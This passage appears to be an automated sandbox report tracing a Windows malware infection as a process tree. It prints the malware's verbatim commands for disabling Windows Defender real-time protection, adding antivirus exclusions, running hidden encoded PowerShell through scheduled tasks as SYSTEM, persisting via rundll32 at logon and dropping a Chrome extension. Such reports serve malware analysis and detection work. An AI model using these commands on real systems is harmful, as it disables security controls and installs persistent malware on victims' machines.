        
        PID:2788
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2756
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "bmQWCxleEgxbTUrSZz" /SC once /ST 22:38:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\zaBVKDgOQJLqBjiNo\lWMApHnNtvIHqRb\tgOgpoU.exe\" xv /vSmdidC 525403 /S" /V1 /F
      4⤵
      Drops file in Windows directory
      Scheduled Task/Job: Scheduled Task
      PID:2600
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 580
      4⤵
      Loads dropped DLL
      Program crash
      PID:316

C:\Windows\system32\taskeng.exe
taskeng.exe {8B9E9C08-D96E-47CC-B332-90ED665C187E} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Suspicious use of WriteProcessMemory
PID:2028
- C:\Users\Admin\AppData\Local\Temp\zaBVKDgOQJLqBjiNo\lWMApHnNtvIHqRb\tgOgpoU.exe
  C:\Users\Admin\AppData\Local\Temp\zaBVKDgOQJLqBjiNo\lWMApHnNtvIHqRb\tgOgpoU.exe xv /vSmdidC 525403 /S
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious use of WriteProcessMemory
  PID:2472
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gCfUWcXkf" /SC once /ST 18:33:06 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1284
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gCfUWcXkf"
    3⤵
    PID:1264
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gCfUWcXkf"
    3⤵
    PID:1816
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
    3⤵
    PID:328
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:2168
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
    3⤵
    PID:1996
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:1984
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gRcGeUXaa" /SC once /ST 08:33:32 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1516
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gRcGeUXaa"
    3⤵
    PID:1316
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gRcGeUXaa"
    3⤵
    PID:1820
- - C:\Windows\SysWOW64\forfiles.exe
    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
    3⤵
    PID:1664
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
      4⤵
      PID:1580
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1688
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2136
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ruCXiJvmKkuTmmIt" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1240
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ruCXiJvmKkuTmmIt" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2180
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ruCXiJvmKkuTmmIt" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:664
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ruCXiJvmKkuTmmIt" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:3024
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ruCXiJvmKkuTmmIt" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2692
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ruCXiJvmKkuTmmIt" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2540
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ruCXiJvmKkuTmmIt" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2536
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ruCXiJvmKkuTmmIt" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2576
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C copy nul "C:\Windows\Temp\ruCXiJvmKkuTmmIt\nBppcpdZ\ahHQenwSVcyoUFLD.wsf"
    3⤵
    PID:2684
- - C:\Windows\SysWOW64\wscript.exe
    wscript "C:\Windows\Temp\ruCXiJvmKkuTmmIt\nBppcpdZ\ahHQenwSVcyoUFLD.wsf"
    3⤵
    - Modifies data under HKEY_USERS
    PID:2572
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ATiuMetuMWHU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1956
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ATiuMetuMWHU2" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2616
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DcwzooFfPwZYrvRkwnR" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2936
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DcwzooFfPwZYrvRkwnR" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2404
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IchmcMfQaXUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1668
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IchmcMfQaXUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1312
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UyPATDbiwjgOC" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2592
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UyPATDbiwjgOC" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2836
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VcCVDDBRU" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2412
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VcCVDDBRU" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1052
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NonltQQlyMoZtVVB" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1504
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NonltQQlyMoZtVVB" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1808
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1980
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1420
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\zaBVKDgOQJLqBjiNo" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1232
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\zaBVKDgOQJLqBjiNo" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1308
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ruCXiJvmKkuTmmIt" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1220
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ruCXiJvmKkuTmmIt" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1716
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ATiuMetuMWHU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2156
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ATiuMetuMWHU2" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2256
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DcwzooFfPwZYrvRkwnR" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:540
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DcwzooFfPwZYrvRkwnR" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:324
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IchmcMfQaXUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1104
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IchmcMfQaXUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1708
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UyPATDbiwjgOC" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2888
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UyPATDbiwjgOC" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2296
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VcCVDDBRU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2496
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VcCVDDBRU" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1964
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NonltQQlyMoZtVVB" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1080
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NonltQQlyMoZtVVB" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1516
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1772
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1072
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\zaBVKDgOQJLqBjiNo" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:692
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\zaBVKDgOQJLqBjiNo" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:768
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ruCXiJvmKkuTmmIt" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1376
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ruCXiJvmKkuTmmIt" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1756
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gCvobxAkx" /SC once /ST 21:35:20 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2608
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gCvobxAkx"
    3⤵
    PID:2976
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gCvobxAkx"
    3⤵
    PID:2796
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
    3⤵
    PID:2692
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
      4⤵
      PID:2576
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
    3⤵
    PID:2536
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
      4⤵
      PID:2684
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "nsbPTSdSgPuDRRbhc" /SC once /ST 07:45:31 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ruCXiJvmKkuTmmIt\lexazqZPNEWTjjp\JyKDiOp.exe\" X4 /IjKedidJV 525403 /S" /V1 /F
    3⤵
    - Drops file in Windows directory
    - Scheduled Task/Job: Scheduled Task
    PID:2568
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "nsbPTSdSgPuDRRbhc"
    3⤵
    PID:2632
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2472 -s 472
    3⤵
    - Loads dropped DLL
    - Program crash
    PID:2116
- C:\Windows\Temp\ruCXiJvmKkuTmmIt\lexazqZPNEWTjjp\JyKDiOp.exe
  C:\Windows\Temp\ruCXiJvmKkuTmmIt\lexazqZPNEWTjjp\JyKDiOp.exe X4 /IjKedidJV 525403 /S
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Drops Chrome extension
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:2228
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "bmQWCxleEgxbTUrSZz"
    3⤵
    PID:1004
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
    3⤵
    PID:1292
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
      4⤵
      PID:556
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        5⤵
        
        PID:1720
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2036
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1320
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
      4⤵
      PID:2252
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
        5⤵
        
        PID:1256
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2068
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1152
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\VcCVDDBRU\DyLUGV.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "RShenKKeUbJzTjI" /V1 /F
    3⤵
    - Drops file in Windows directory
    - Scheduled Task/Job: Scheduled Task
    PID:2836
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "RShenKKeUbJzTjI2" /F /xml "C:\Program Files (x86)\VcCVDDBRU\VVBajwS.xml" /RU "SYSTEM"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2708
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /END /TN "RShenKKeUbJzTjI"
    3⤵
    PID:2540
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "RShenKKeUbJzTjI"
    3⤵
    PID:3048
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "YyXYwmYoaLUdkV" /F /xml "C:\Program Files (x86)\ATiuMetuMWHU2\SunBWXR.xml" /RU "SYSTEM"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2520
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "sCSWtvWCwRQeU2" /F /xml "C:\ProgramData\NonltQQlyMoZtVVB\GmNvriU.xml" /RU "SYSTEM"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2808
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "iHEexGxGyKiKPpGUc2" /F /xml "C:\Program Files (x86)\DcwzooFfPwZYrvRkwnR\jaKjrah.xml" /RU "SYSTEM"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2200
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "bvITFfrvNmRFeACLPQX2" /F /xml "C:\Program Files (x86)\UyPATDbiwjgOC\blIehCe.xml" /RU "SYSTEM"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2872
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "ROHimGgVjIIdgMKwK" /SC once /ST 02:47:44 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ruCXiJvmKkuTmmIt\egkUxadr\IUCPZNk.dll\",#1 /iwHldidQ 525403" /V1 /F
    3⤵
    - Drops file in Windows directory
    - Scheduled Task/Job: Scheduled Task
    PID:1412
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "ROHimGgVjIIdgMKwK"
    3⤵
    PID:2460
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "nsbPTSdSgPuDRRbhc"
    3⤵
    PID:1276
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2228 -s 1536
    3⤵
    - Loads dropped DLL
    - Program crash
    PID:1284
- C:\Windows\system32\rundll32.EXE
  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ruCXiJvmKkuTmmIt\egkUxadr\IUCPZNk.dll",#1 /iwHldidQ 525403
  2⤵
  PID:2712
- - C:\Windows\SysWOW64\rundll32.exe
    C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ruCXiJvmKkuTmmIt\egkUxadr\IUCPZNk.dll",#1 /iwHldidQ 525403
    3⤵
    - Blocklisted process makes network request
    - Checks BIOS information in registry
    - Loads dropped DLL
    - Drops file in System32 directory
    - Enumerates system info in registry
    - Modifies data under HKEY_USERS
    PID:2340
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "ROHimGgVjIIdgMKwK"
      4⤵
      PID:1624

C:\Windows\system32\taskeng.exe
taskeng.exe {57A757E9-C2D2-42BC-9335-F5146DE774D4} S-1-5-21-268080393-3149932598-1824759070-1000:UHRQKJCP\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:340
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2256
- - C:\Windows\system32\gpupdate.exe
